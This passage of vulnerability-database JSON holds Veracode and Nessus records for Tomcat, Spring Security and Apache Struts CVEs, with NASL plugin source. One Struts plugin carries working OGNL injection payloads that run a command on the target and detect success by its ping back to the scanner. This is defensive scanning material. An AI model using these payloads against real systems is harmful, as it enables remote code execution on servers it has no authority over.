10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "2020-12-08T07:38:25", "id": "VERACODE:13001", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-13001/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T15:30:01", "description": "spring-security-config is vulnerable to unauthorized access through method security. It is possible because it does not check the authenticated users hold the required authority to access the methods.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-10T07:20:11", "type": "veracode", "title": "Unauthorised Access Through Method Security", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1258"], "modified": "2022-04-11T18:42:02", "id": "VERACODE:6270", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-6270/summary", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-20T14:39:00", "description": "According to the version of the tomcat packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration.\n Therefore, it is expected that most users will not be impacted by this issue.(CVE-2018-8014)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-07-20T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP2 : tomcat (EulerOS-SA-2018-1220)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:tomcat", "p-cpe:/a:huawei:euleros:tomcat-admin-webapps", "p-cpe:/a:huawei:euleros:tomcat-el-2.2-api", "p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api", "p-cpe:/a:huawei:euleros:tomcat-lib", "p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api", "p-cpe:/a:huawei:euleros:tomcat-webapps", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1220.NASL", "href": "https://www.tenable.com/plugins/nessus/111182", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111182);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2018-8014\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : tomcat (EulerOS-SA-2018-1220)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the tomcat packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - The defaults settings for the CORS filter provided in\n Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31,\n 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and\n enable 'supportsCredentials' for all origins. It is\n expected that users of the CORS filter will have\n configured it appropriately for their environment\n rather than using it in the default configuration.\n Therefore, it is expected that most users will not be\n impacted by this issue.(CVE-2018-8014)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1220\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c6f58db6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected tomcat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"tomcat-7.0.76-3.h1\",\n \"tomcat-admin-webapps-7.0.76-3.h1\",\n \"tomcat-el-2.2-api-7.0.76-3.h1\",\n \"tomcat-jsp-2.2-api-7.0.76-3.h1\",\n \"tomcat-lib-7.0.76-3.h1\",\n \"tomcat-servlet-3.0-api-7.0.76-3.h1\",\n \"tomcat-webapps-7.0.76-3.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-05T14:41:15", "description": "The version of Apache Struts running on the remote host is 2.3.x prior to 2.3.35, or 2.5.x prior to 2.5.17. It, therefore, contains a possible remote code execution vulnerability when results are used without setting a namespace along with an upper action that does not have a namespace set or has a wildcard namespace set.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-08-22T00:00:00", "type": "nessus", "title": "Apache Struts CVE-2018-11776 Results With No Namespace Possible Remote Code Execution (S2-057)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_17.NASL", "href": "https://www.tenable.com/plugins/nessus/112036", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112036);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts CVE-2018-11776 Results With No Namespace Possible Remote Code Execution (S2-057)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by a possible remote code execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.3.x\nprior to 2.3.35, or 2.5.x prior to 2.5.17. It, therefore, contains a\npossible remote code execution vulnerability when results are used\nwithout setting a namespace along with an upper action that does not\nhave a namespace set or has a wildcard namespace set.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2018/Aug/46\");\n script_set_attribute(attribute:\"see_also\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.3\", \"max_version\" : \"2.3.34\", \"fixed_version\" : \"2.3.35\" },\n { \"min_version\" : \"2.5\", \"max_version\" : \"2.5.16\", \"fixed_version\" : \"2.5.17\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-05T14:40:20", "description": "The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the handling of results with no namespace set. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.", "cvss3": {}, "published": "2018-08-23T00:00:00", "type": "nessus", "title": "Apache Struts CVE-2018-11776 Results With No Namespace Remote Code Execution (S2-057) (remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2023-07-17T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_17_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/112064", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112064);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/17\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts CVE-2018-11776 Results With No Namespace Remote Code Execution (S2-057) (remote)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is affected by\na remote code execution vulnerability in the handling of results with\nno namespace set. An unauthenticated, remote attacker can exploit this,\nvia a specially crafted HTTP request, to potentially execute arbitrary\ncode, subject to the privileges of the web server user.\");\n # https://www.tenable.com/blog/new-apache-struts-vulnerability-could-allow-for-remote-code-execution\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a21304a0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2018/Aug/46\");\n script_set_attribute(attribute:\"see_also\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.35 / 2.5.17 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach var cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match4 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match4))\n {\n urls = make_list(urls, match4[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\n\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\nscanner_ip = compat::this_host();\ntarget_ip = get_host_ip();\nvuln = FALSE;\n\nua = get_kb_item(\"global_settings/http_user_agent\");\nif (empty_or_null(ua))\n ua = 'Nessus';\n\npat = hexstr(rand_str(length:10));\n\nos = get_kb_item(\"Host/OS\");\nif (!empty_or_null(os) && \"windows\" >< tolower(os))\n{\n ping_cmd = \"ping%20-n%203%20-l%20500%20\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip + \" and greater 500\";\n}\nelse\n{\n ping_cmd = \"ping%20-c%203%20-p%20\" + pat + \"%20\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip;\n}\n\npayload_redirect = \"%24%7B%7B57550614+16044095%7D%7D/\";\npayload_redirect_verify_regex = \"Location: .*\\[73594709\\]\";\n\npayload_2_2 = \"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27\" + ping_cmd + \"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/\";\n\npayload_2_3 = \"%24%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23cmd%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27\" + ping_cmd + \"%27%29%29%7D/\";\n\nfunction namespace_inject(url, payload)\n{\n local_var bits, last, attack_url;\n\n # find the last / and put it after\n bits = split(url, sep:\"/\", keep:TRUE);\n last = max_index(bits) - 1;\n for (var i=0;i<last;i++)\n attack_url = attack_url + bits[i];\n attack_url = attack_url + payload;\n attack_url = attack_url + bits[last];\n\n return attack_url;\n}\n\nforeach var url (urls)\n{\n # first we try the 2.3.x payload\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n attack_url = namespace_inject(url:url, payload:payload_2_3);\n\n req =\n 'GET ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n '\\n';\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter,timeout:timeout);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n var snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic. '+\n 'Below is the response :' +\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic and looking for'+\n '\\nthe pattern sent in our packet (' + pat + '). Below is the response :'+\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # next we try the 2.2.x payload\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n attack_url = namespace_inject(url:url, payload:payload_2_2);\n\n req =\n 'GET ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n '\\n';\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter,timeout:timeout);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic. '+\n 'Below is the response :' +\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic and looking for'+\n '\\nthe pattern sent in our packet (' + pat + '). Below is the response :'+\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # and finally, we try a simple redirect namespace injection\n attack_url = namespace_inject(url:url, payload:payload_redirect);\n\n res = http_send_recv3(\n method : \"GET\",\n item : attack_url,\n port : port,\n exit_on_fail : TRUE,\n follow_redirect: 0\n );\n\n if (res[1] =~ payload_redirect_verify_regex)\n {\n vuln = TRUE;\n vuln_url = attack_url;\n report =\n '\\nNessus confirmed this issue by injecting a simple OGNL addition payload'+\n '\\n( ${{57550614+16044095}} ) into a redirect action namespace. Below is' +\n '\\nthe response :'+\n '\\n\\n' + snip +\n '\\n' + res[1] +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(vuln_url),\n output : report\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-05T14:41:58", "description": "According to its self-reported version, the Cisco Unified Communications Manager (CUCM) running on the remote device is affected by a remote code execution vulnerability. Please see the included Cisco BID and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-09-05T00:00:00", "type": "nessus", "title": "Cisco Unified Communication Manager Apache Struts RCE (CSCvm14042)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager"], "id": "CISCO-SA-20180823-APACHE-STRUTS-UCM.NASL", "href": "https://www.tenable.com/plugins/nessus/112289", "sourceData": "#TRUSTED 5538e58acd3b9c3603d69886501b4d03206d911e89a8d42c5b4e7eca707c4d625bc7498ef348a9ccbcb5336c36a12a8c522e9b7208a928417ca393d93d9b75b3674b5020a3adf4e9ded633106ddd86864d79657cbdb95644342b2f275592d8f9e6fc1f66ff78f01c1325c212b34be69ad9e19e9079abea97ba850b3de2a5b4c17ea6bcb025e35351d747f7a3bfd9a692abe32cfb1acd6df9a1ed4437cef173f52741ba940ea420a6a307c28113c77d3911f694bbd8b4770b2e393e952b7721160a3ace2b9a105b946878666ddb6b6277e8dd37cc0b540d3cab9ba05675333685d3567dc787a898345d49807afa2c4e8dadc80157671c59645ec28d4d731254f700afcdde8541b7fc40f5bf22104a815dfb9ffec8005793c65a930bc671999876981b110d057967ac4aec3e59486c42d91bfdbacd15266c2227ee145c9c1f68b594923b7c279533429a89c5a243111afa033972ae83c9fc79e2601de851679ed9c299cb484ffd80c57ac3b34925bb3cba116fcda0316d36ecd2faa6315da0eb4e36614b14339a5b4a8bf1733e633b7f9f29f76f24eb6dbba11d66280d6e3e0195481f24ff5256f30dbac9ca2fbd0297cc6cc377e602403cf222d850e159cf5a4a46f673c55f9ece04e1b4703056a271d88239f32fd0101e729543bc9b902ffe81653218ce1f59a8de7edc84c8cd3a6afeafbbf24ba8b4385bcd815cde5a4733f9\n#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112289);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14042\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Unified Communication Manager Apache Struts RCE (CSCvm14042)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Unified\nCommunications Manager (CUCM) running on the remote device is affected\nby a remote code execution vulnerability. Please see the included\nCisco BID and the Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14042\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14042.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n 